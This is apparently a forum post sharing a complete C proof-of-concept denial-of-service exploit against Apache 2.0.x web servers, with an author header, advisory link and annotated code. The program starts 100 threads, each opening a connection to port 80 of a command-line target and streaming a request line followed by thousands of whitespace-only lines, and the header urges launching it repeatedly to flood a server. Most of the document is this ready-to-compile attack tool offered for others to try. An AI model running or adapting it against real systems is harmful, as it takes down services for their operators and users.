Pruébenlo y espero comentarios...
Código:
/*
## [+] Apache/2.0.x and prior ( <= 2.0.x ) Remote Denial of Service (DoS)
## Proof of Concept
##
## [-] A. Alejandro Hernandez Hernandez <nitrous@hax0rs.biz>
## [-] http://nitrous.hax0rs.biz/
## [-] 13/nov/2004
##
## [*] Advisory: http://securitytracker.com/id?1012083
##
## How it works:
## It opens 100 connections, and each one sends:
##
## GET / HTTP/1.0\n
## [space]x7000\n
## [space]x7000\n
## [space]x7000\n
## ...
## 6000 times
##
## COMPILATION: $gcc apache_dos_xpl.c -o exploit -lpthread
## The flag -lpthread or -pthread IS NECESSARY !
## NOTE: Launch the exploit many times. I launched the exploit 7 or 8 times to
## fl00d my Apache/2.0.40 on Red Hat Linux 9.0
##
## gr33tz: VF Labs (www.vulnfact.com), #null people, #cum people, CRAc, t0wn3r,
## halo, dr_fdisk, flux, dex, ran, beavis...Tek brothers & systers ;)
*/
#include<stdio.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
#include<pthread.h>
/* Number of threads main() starts; each thread opens one connection. */
#define TOTAL_THREADS 100
/* Size in bytes of the payload buffer (one whitespace-only line). */
#define SPACES 7000
/* Payload shared by all threads: filled once in main(), only read in attack(). */
char payl0ad[SPACES];
/* Resolver result for the host named on the command line; set in main(). */
struct hostent *hostname;
/*
 * attack - thread entry point; opens one TCP connection to the target and
 * streams the whitespace payload over it.
 *
 * no_used: ignored (main() passes a null pointer).
 * Returns: nothing useful; the thread ends through pthread_exit(NULL).
 *
 * What goes on the wire, per connection: the request line "GET / HTTP/1.0\n"
 * followed by 6000 copies of payl0ad. With the initialisation done in main()
 * each copy is 6998 spaces plus '\n' (strlen() stops at the NUL), so roughly
 * 42 MB in total. This function never sends an empty line after them.
 *
 * For defenders: the pattern to look for is many parallel connections from
 * one client, each carrying a request line followed by thousands of long
 * lines that contain only spaces. Affected versions and the remediation are
 * covered by the advisory linked in the file header.
 */
void *attack(void *no_used)
{
struct sockaddr_in target;
/* sent_bytes is initialised here but never used in this function. */
int sokete,cont,sent_bytes=0;
char *request="GET / HTTP/1.0\n";
target.sin_family=AF_INET;
/* h_addr is the first address in the list returned by gethostbyname(). */
target.sin_addr=*((struct in_addr *)hostname->h_addr);
/* Destination port is fixed to 80. */
target.sin_port=htons(80);
bzero(&(target.sin_zero),8);
if((sokete=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
/* exit() terminates the whole process, not only this thread. */
exit(-1);
}
if((connect(sokete,(struct sockaddr *)&target,sizeof(target)))==-1)
{
perror("connect()");
/* Same here: one failed connect ends every thread. */
exit(-1);
}
/* The return values of the send() calls below are not checked. */
send(sokete,request,strlen(request),0);
for(cont=1;cont<=6000;cont++)
send(sokete,payl0ad,strlen(payl0ad),0);
/* The socket is not closed in this function before the thread ends. */
pthread_exit(NULL);
}
/*
 * main - resolves the host given as the only argument, builds the shared
 * payload and starts TOTAL_THREADS threads that each run attack().
 *
 * argv[1]: host name or address of the target, passed to gethostbyname().
 * Exit status: -1 on a usage error or when pthread_create() fails, 0 when the
 * name lookup fails.
 *
 * The definition relies on the implicit-int return type, and exit() is called
 * without <stdlib.h> among the includes of this listing.
 */
main(int argc,char **argv)
{
pthread_t threads[TOTAL_THREADS];
int aux,k;
if(argc!=2)
{
fprintf(stdout,"Usage: %s <target>\n",argv[0]);
exit(-1);
}
/* The result is stored in the global that attack() reads. */
if((hostname=gethostbyname(argv[1]))==NULL)
{
/* NOTE(review): gethostbyname() reports failures through h_errno, so the
   text perror() prints here may not describe the lookup error. */
perror("gethostbyname()");
exit(0);
}
printf("\t------------------------------------------------\n");
printf("\t Apache 2.0.x & < Remote DoS - Proof of Concept \n");
printf("\t------------------------------------------------\n");
printf("\nLaunching the Attack against %s...\n",argv[1]);
/* Fill the buffer with spaces, then turn the last two bytes into '\n' and
   the NUL terminator, which leaves 6998 spaces of content. */
memset(payl0ad,0x20,SPACES); /* 0x20 = Hex value of Blank Space = ' ' */
payl0ad[SPACES-2]='\n';
payl0ad[SPACES-1]='\0';
for(k=0;k<TOTAL_THREADS;k++)
{
/* pthread_create() returns non-zero on failure; aux is not used otherwise. */
if((aux=pthread_create(&threads[k],NULL,attack,(void *)0)))
{
fprintf(stdout,"Error: pthread_create()\n\n");
exit(-1);
}
}
}









